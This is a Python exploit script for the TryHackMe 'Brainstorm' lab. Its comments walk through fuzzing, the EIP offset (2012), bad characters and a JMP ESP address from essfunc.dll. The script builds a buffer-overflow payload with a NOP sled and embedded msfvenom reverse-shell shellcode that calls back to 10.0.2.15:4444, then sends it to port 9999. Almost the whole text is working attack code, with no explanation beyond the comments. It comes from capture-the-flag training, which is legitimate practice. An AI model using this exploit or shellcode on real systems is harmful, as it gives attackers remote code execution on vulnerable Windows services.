THM - Brainstorm

Exploit

#!/usr/bin/env python3
import socket, time, sys, subprocess

ip = "10.0.2.4"
port = 9999

#> buffer size 4096
# payload = (b"A" * 4096)
# payload = (b"A" * 4092)  + (b"B" * 4)

#> Create payload -> msf-pattern_create -l 4096
#> Search offset (EIP) -> msf-pattern_offset -l 4096 -q 31704330 -> 2012
# payload = (b"A" * 2012) + (b"B" * 4) + (b"C" * 2076) + (b"D" * 4)

#> badchar \x00
#> msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.15 LPORT=4444 -b "\x00" -f python EXITFUNC=thread

buf =  b""
buf += b"\xda\xcd\xba\x3a\x59\x28\xc6\xd9\x74\x24\xf4\x5d\x2b"
buf += b"\xc9\xb1\x52\x83\xed\xfc\x31\x55\x13\x03\x6f\x4a\xca"
buf += b"\x33\x73\x84\x88\xbc\x8b\x55\xed\x35\x6e\x64\x2d\x21"
buf += b"\xfb\xd7\x9d\x21\xa9\xdb\x56\x67\x59\x6f\x1a\xa0\x6e"
buf += b"\xd8\x91\x96\x41\xd9\x8a\xeb\xc0\x59\xd1\x3f\x22\x63"
buf += b"\x1a\x32\x23\xa4\x47\xbf\x71\x7d\x03\x12\x65\x0a\x59"
buf += b"\xaf\x0e\x40\x4f\xb7\xf3\x11\x6e\x96\xa2\x2a\x29\x38"
buf += b"\x45\xfe\x41\x71\x5d\xe3\x6c\xcb\xd6\xd7\x1b\xca\x3e"
buf += b"\x26\xe3\x61\x7f\x86\x16\x7b\xb8\x21\xc9\x0e\xb0\x51"
buf += b"\x74\x09\x07\x2b\xa2\x9c\x93\x8b\x21\x06\x7f\x2d\xe5"
buf += b"\xd1\xf4\x21\x42\x95\x52\x26\x55\x7a\xe9\x52\xde\x7d"
buf += b"\x3d\xd3\xa4\x59\x99\xbf\x7f\xc3\xb8\x65\xd1\xfc\xda"
buf += b"\xc5\x8e\x58\x91\xe8\xdb\xd0\xf8\x64\x2f\xd9\x02\x75"
buf += b"\x27\x6a\x71\x47\xe8\xc0\x1d\xeb\x61\xcf\xda\x0c\x58"
buf += b"\xb7\x74\xf3\x63\xc8\x5d\x30\x37\x98\xf5\x91\x38\x73"
buf += b"\x05\x1d\xed\xd4\x55\xb1\x5e\x95\x05\x71\x0f\x7d\x4f"
buf += b"\x7e\x70\x9d\x70\x54\x19\x34\x8b\x3f\x2c\xc9\x91\xb0"
buf += b"\x58\xcb\x95\xdf\xc4\x42\x73\xb5\xe4\x02\x2c\x22\x9c"
buf += b"\x0e\xa6\xd3\x61\x85\xc3\xd4\xea\x2a\x34\x9a\x1a\x46"
buf += b"\x26\x4b\xeb\x1d\x14\xda\xf4\x8b\x30\x80\x67\x50\xc0"
buf += b"\xcf\x9b\xcf\x97\x98\x6a\x06\x7d\x35\xd4\xb0\x63\xc4"
buf += b"\x80\xfb\x27\x13\x71\x05\xa6\xd6\xcd\x21\xb8\x2e\xcd"
buf += b"\x6d\xec\xfe\x98\x3b\x5a\xb9\x72\x8a\x34\x13\x28\x44"
buf += b"\xd0\xe2\x02\x57\xa6\xea\x4e\x21\x46\x5a\x27\x74\x79"
buf += b"\x53\xaf\x70\x02\x89\x4f\x7e\xd9\x09\x6f\x9d\xcb\x67"
buf += b"\x18\x38\x9e\xc5\x45\xbb\x75\x09\x70\x38\x7f\xf2\x87"
buf += b"\x20\x0a\xf7\xcc\xe6\xe7\x85\x5d\x83\x07\x39\x5d\x86"

# payload = (b"A" * 2012) + (b"B" * 4) + (b"C" * (2076 - len(buf))) + buf + (b"D" * 4)

# payload = (b"A" * 2012) + (b"B" * 4) + (b"\x90" * (2076 - len(buf))) + buf + (b"D" * 4)

#The address for EIP can be found using mona (!mona modules and !mona jmp -r esp -cpb "\x00"). As essfunc.dll is not protected by ASLR this is our best hit.

payload = (b"A" * 2012) + (b"\xdf\x14\x50\x62") + (b"\x90" * (2076 - len(buf))) + buf + (b"D" * 4)


print("Pyadlod size: {} payload: {}".format(len(payload), payload))

#sys.exit(0)

try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(5)
        s.connect((ip, port))
        s.recv(1024)
        s.recv(1024)
        s.send(bytes("HACKER", "latin-1"))
        s.recv(1024)
        print("Exploit with {} bytes".format(len(payload)))
        s.send(payload)
        s.recv(1024)
except:
    print("Fuzzing crached at {} bytes".format(len(payload)))
    sys.exit(0)